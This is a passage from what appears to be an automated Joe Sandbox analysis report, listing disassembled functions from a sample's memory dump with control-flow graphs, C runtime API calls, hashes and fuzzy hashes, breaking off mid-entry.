                                                                                                                                                    control_flow_graph 551 2256437-2256440 552 2256466 551->552 553 2256442-2256446 551->553 555 2256468-225646b 552->555 553->552 554 2256448-2256459 call 2259636 553->554 558 225646c-225647d call 2259636 554->558 559 225645b-2256460 call 2255ba8 554->559 564 225647f-2256480 call 225158d 558->564 565 2256488-225649a call 2259636 558->565 559->552 569 2256485-2256486 564->569 570 22564ac-22564cd call 2255f4c call 2256837 565->570 571 225649c-22564aa call 225158d * 2 565->571 569->559 580 22564e2-2256500 call 225158d call 2254edc call 2254d82 call 225158d 570->580 581 22564cf-22564dd call 225557d 570->581 571->569 590 2256507-2256509 580->590 586 2256502-2256505 581->586 587 22564df 581->587 586->590 587->580 590->555
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1259313771.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_2230000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1442030790-0
                                                                                                                                                    • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                                                                                    • Instruction ID: 25790a7977ede88272a57e704731bc47d5bc405687dfbe85b4c25106b1e011c1
                                                                                                                                                    • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                                                                                    • Instruction Fuzzy Hash: 31219F35134771AAE7317FE5D805E2B7BEADF41760BA0C029EC49550ACEB328960CE91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02253F16 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 595 2253f16-2253f2f 596 2253f31-2253f3b call 2255ba8 call 2254c72 595->596 597 2253f49-2253f5e call 225bdc0 595->597 606 2253f40 596->606 597->596 602 2253f60-2253f63 597->602 604 2253f65 602->604 605 2253f77-2253f7d 602->605 607 2253f67-2253f69 604->607 608 2253f6b-2253f75 call 2255ba8 604->608 609 2253f7f 605->609 610 2253f89-2253f9a call 2260504 call 22601a3 605->610 611 2253f42-2253f48 606->611 607->605 607->608 608->606 609->608 613 2253f81-2253f87 609->613 619 2254185-225418f call 2254c9d 610->619 620 2253fa0-2253fac call 22601cd 610->620 613->608 613->610 620->619 625 2253fb2-2253fbe call 22601f7 620->625 625->619 628 2253fc4-2253fcb 625->628 629 2253fcd 628->629 630 225403b-2254046 call 22602d9 628->630 632 2253fd7-2253ff3 call 22602d9 629->632 633 2253fcf-2253fd5 629->633 630->611 636 225404c-225404f 630->636 632->611 640 2253ff9-2253ffc 632->640 633->630 633->632 638 2254051-225405a call 2260554 636->638 639 225407e-225408b 636->639 638->639 650 225405c-225407c 638->650 642 225408d-225409c call 2260f40 639->642 643 2254002-225400b call 2260554 640->643 644 225413e-2254140 640->644 651 225409e-22540a6 642->651 652 22540a9-22540d0 call 2260e90 call 2260f40 642->652 643->644 653 2254011-2254029 call 22602d9 643->653 644->611 650->642 651->652 661 22540d2-22540db 652->661 662 22540de-2254105 call 2260e90 call 2260f40 652->662 653->611 658 225402f-2254036 653->658 658->644 661->662 667 2254107-2254110 662->667 668 2254113-2254122 call 2260e90 662->668 667->668 671 2254124 668->671 672 225414f-2254168 668->672 673 2254126-2254128 671->673 674 225412a-2254138 671->674 675 225413b 672->675 676 225416a-2254183 672->676 673->674 677 2254145-2254147 673->677 674->675 675->644 676->644 677->644 678 2254149 677->678 678->672 679 225414b-225414d 678->679 679->644 679->672
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 02253F51
                                                                                                                                                      • Part of subcall function 02255BA8: __getptd_noexit.LIBCMT ref: 02255BA8
                                                                                                                                                    • __gmtime64_s.LIBCMT ref: 02253FEA
                                                                                                                                                    • __gmtime64_s.LIBCMT ref: 02254020
                                                                                                                                                    • __gmtime64_s.LIBCMT ref: 0225403D
                                                                                                                                                    • __allrem.LIBCMT ref: 02254093
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022540AF
                                                                                                                                                    • __allrem.LIBCMT ref: 022540C6
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 022540E4
                                                                                                                                                    • __allrem.LIBCMT ref: 022540FB
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02254119
                                                                                                                                                    • __invoke_watson.LIBCMT ref: 0225418A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1259313771.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_2230000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 384356119-0
                                                                                                                                                    • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                                                    • Instruction ID: 814692f06624a1ad1155d859876ebc06eee1a40dfbfbd8a01aeda6d2f92bb356
                                                                                                                                                    • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                                                    • Instruction Fuzzy Hash: FC71CE72A20727ABD714EEF9CC41B6AB3B5BF10364F14C165ED14D6694E770D980CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0225650E Relevance: 16.6, APIs: 11, Instructions: 131COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1259313771.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_2230000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3432600739-0
                                                                                                                                                    • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                                                                                                                                    • Instruction ID: 3b8ff45f270b0a2daa355efd1bf6791405a89bff1f33c60a3586cd813fb8a706
                                                                                                                                                    • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                                                                                                                                    • Instruction Fuzzy Hash: 13412432920325EFDB10AFE4D840BAE7BFAAF04324F50C42DED1456198CB799584DF51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0227FC0C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 0227FC1F
                                                                                                                                                      • Part of subcall function 0226169C: std::exception::_Copy_str.LIBCMT ref: 022616B5
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0227FC34
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 0227FC4D
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0227FC62
                                                                                                                                                    • std::regex_error::regex_error.LIBCPMT ref: 0227FC74
                                                                                                                                                      • Part of subcall function 0227F914: std::exception::exception.LIBCMT ref: 0227F92E
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0227FC82
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 0227FC9B
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0227FCB0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1259313771.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_2230000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
                                                                                                                                                    • String ID: leM
                                                                                                                                                    • API String ID: 3569886845-2926266777
                                                                                                                                                    • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                                                                    • Instruction ID: 03bfddb943f90b9568e11bbb4932e08b51cf76f511314d289763fff2e4c0e2a7
                                                                                                                                                    • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                                                                    • Instruction Fuzzy Hash: 30111C79C0030DBBCF04FFE5D459CEDBB7DAA04340B508566AD1897244EB74A3988F94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0223F010 Relevance: 15.1, APIs: 10, Instructions: 78COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1259313771.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_2230000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free_malloc_wprintf$_sprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3721157643-0
                                                                                                                                                    • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                                                                                    • Instruction ID: 0a5368b189060816aa5de5eaaf0aae83e35cf49c823aa83d005aacfa3277b1cf
                                                                                                                                                    • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                                                                                    • Instruction Fuzzy Hash: E3113AB69207707AC26262F91C11FFF3BDD9F45711F040169FE8CE1184DA385A1497B1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02241960 Relevance: 13.6, APIs: 9, Instructions: 149COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1259313771.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_2230000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Exception@8Throw$_memset$_malloc_sprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 65388428-0
                                                                                                                                                    • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                                                                                    • Instruction ID: 2c10fc2236181a231923708a1e3be375810fb4f736066c2e94e18a9b43bd0662
                                                                                                                                                    • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                                                                                    • Instruction Fuzzy Hash: BD517D71D40219ABEB11DBE1DC85FEFBBB9FF04704F100025F909B6294EB746A118BA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0223F210 Relevance: 10.7, APIs: 7, Instructions: 165COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1259313771.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_2230000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Exception@8Throw$_memset_sprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 217217746-0
                                                                                                                                                    • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                                                                    • Instruction ID: d13dbb241e13fc976d0fb73ec078e24dbcd2cac6488ff1d9a1d7537de60f7c41
                                                                                                                                                    • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                                                                    • Instruction Fuzzy Hash: 8E51AFB1D50249EAEF11DFE1DD46FEEBB79FB04704F204025F905B6184E7B4AA058BA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0223F440 Relevance: 10.7, APIs: 7, Instructions: 159COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1259313771.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_2230000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Exception@8Throw$_memset_sprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 217217746-0
                                                                                                                                                    • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                                                                    • Instruction ID: 67efcb6a86c8f0ebcbd69a0ef8903d8d7886842a72e2b85c074cb1fd59af618f
                                                                                                                                                    • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                                                                    • Instruction Fuzzy Hash: E05173B2D50209AADF21DFE1DD45FEEBBB9FB04704F200129F905B6184E77469058BA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0227208B Relevance: 9.1, APIs: 6, Instructions: 112COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1259313771.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_2230000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3534693527-0
                                                                                                                                                    • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                                                                                    • Instruction ID: 19c6dc87b03f86396a01aaf8765a1d202acf8a395219c2b26f4bcf550115c067
                                                                                                                                                    • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                                                                                    • Instruction Fuzzy Hash: 9E31F432938332EADB217EE4CC00B6E6795AF55B24F108215ED04EB29CDB748540CAB1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 022F66D9 Relevance: 9.1, APIs: 6, Instructions: 100COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __getptd_noexit.LIBCMT ref: 022F66DD
                                                                                                                                                      • Part of subcall function 022559BF: __calloc_crt.LIBCMT ref: 022559E2
                                                                                                                                                      • Part of subcall function 022559BF: __initptd.LIBCMT ref: 02255A04
                                                                                                                                                    • __calloc_crt.LIBCMT ref: 022F6700
                                                                                                                                                    • __get_sys_err_msg.LIBCMT ref: 022F671E
                                                                                                                                                    • __invoke_watson.LIBCMT ref: 022F673B
                                                                                                                                                    • __get_sys_err_msg.LIBCMT ref: 022F676D
                                                                                                                                                    • __invoke_watson.LIBCMT ref: 022F678B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1259313771.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_2230000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4066021419-0
                                                                                                                                                    • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                                                                    • Instruction ID: 2ed4ac4be7ed269da9b92aeab2fbc1848a98993b9c486297d20aad4572720ff2
                                                                                                                                                    • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                                                                    • Instruction Fuzzy Hash: 0B11B2326207256BEB617EE59C00BBBF39DDF00765B004436FE2896248E735DD408AE4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02242670 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 382COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1259313771.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_2230000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset
                                                                                                                                                    • String ID: D
                                                                                                                                                    • API String ID: 2102423945-2746444292
                                                                                                                                                    • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                                                                    • Instruction ID: 84b323fa707e1da0b9ef26722cccd563b4b50e046c513c9cbbbdbdb9805dd8fa
                                                                                                                                                    • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                                                                    • Instruction Fuzzy Hash: FDE16C71D1021AEACF28DFE1CD49FEEB7B8BF04304F144169E909A6194EB74AA45CF54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0223D8B0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 228COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1259313771.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_2230000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset
                                                                                                                                                    • String ID: $$$(
                                                                                                                                                    • API String ID: 2102423945-3551151888
                                                                                                                                                    • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                                                                    • Instruction ID: 981b111b083f47d21a4a69629f22b3cc7458d3bfb57fca88c7bb567c9022173d
                                                                                                                                                    • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                                                                    • Instruction Fuzzy Hash: 0E918BB1D10219EAEF21DFE0CC49BEEBBB9AF05304F244169D40577284DBB65A48CFA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02255CE1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1259313771.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_2230000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcsnlen
                                                                                                                                                    • String ID: U
                                                                                                                                                    • API String ID: 3628947076-3372436214
                                                                                                                                                    • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                                                                                                                                    • Instruction ID: 9714f3eddca0c9865312de31f85f3160684ed3dae4a470a2a9fcca9f9f1a32b0
                                                                                                                                                    • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                                                                                                                                    • Instruction Fuzzy Hash: 77215B33238329AAEB009BE4AC44BBE739DDB45350F908165FD08C6198FF71E9508AA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0224A810 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1259313771.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_2230000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset
                                                                                                                                                    • String ID: p2Q
                                                                                                                                                    • API String ID: 2102423945-1521255505
                                                                                                                                                    • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                                                                    • Instruction ID: 6ca8c146b9e77374386af4ccfc87ff9b8057c3a76163d931eb717c0674dd610a
                                                                                                                                                    • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                                                                    • Instruction Fuzzy Hash: 0FF0E578695750A5F7117790BC267857D917B31B09F108044E5142E2E5D3FD234C6B99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0227FBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 0227FBF1
                                                                                                                                                      • Part of subcall function 0226169C: std::exception::_Copy_str.LIBCMT ref: 022616B5
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 0227FC06
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1259313771.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_2230000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
                                                                                                                                                    • String ID: TeM$TeM
                                                                                                                                                    • API String ID: 3662862379-3870166017
                                                                                                                                                    • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                                                                    • Instruction ID: 7e3629821c04addec904b45f97ee8fb7dee2fb10168117dfe82acf690b0f0462
                                                                                                                                                    • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                                                                    • Instruction Fuzzy Hash: 67D01779C0030CBBCB00EFA4D449CDDBBB8AA00304B008462A91897244EA74A3898FC4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0223D0E0 Relevance: 6.3, APIs: 4, Instructions: 254COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0225197D: __wfsopen.LIBCMT ref: 02251988
                                                                                                                                                    • _fgetws.LIBCMT ref: 0223D15C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1259313771.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_2230000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __wfsopen_fgetws
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 853134316-0
                                                                                                                                                    • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                                                                    • Instruction ID: a26b67188050d134ef76b4e5d9a4df2d1f40b942bfc2d8401ce3ac5807fc2bfb
                                                                                                                                                    • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                                                                    • Instruction Fuzzy Hash: A991C3B2D2031AABCF22DFE4CC847AEB7B5BF04304F144529E815A7245E7B5AA14CF91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0223D540 Relevance: 6.2, APIs: 4, Instructions: 240COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1259313771.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_2230000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _malloc$__except_handler4_fprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1783060780-0
                                                                                                                                                    • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                                                                                                                                    • Instruction ID: 9a56ce7d285c602e3340d13276e8fb2198a66aeee00214538cc49195d89feae5
                                                                                                                                                    • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                                                                                                                                    • Instruction Fuzzy Hash: 49A18DB0C10358EBEF11EFE4DC45BEEBB76AF14304F144128D80576295D7B69A48CBA6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02252AD0 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1259313771.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_2230000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2974526305-0
                                                                                                                                                    • Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                                                                                                                                    • Instruction ID: 9e452ffa5948a834d4fb1187676ea088b2d972b1d6739e266d16df74cbeeb60b
                                                                                                                                                    • Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                                                                                                                                    • Instruction Fuzzy Hash: 3D51A170A20726DBDB288FF9888466EB7B6BF40325F14C729FC35962D8D7B19950CB40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 02271359 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
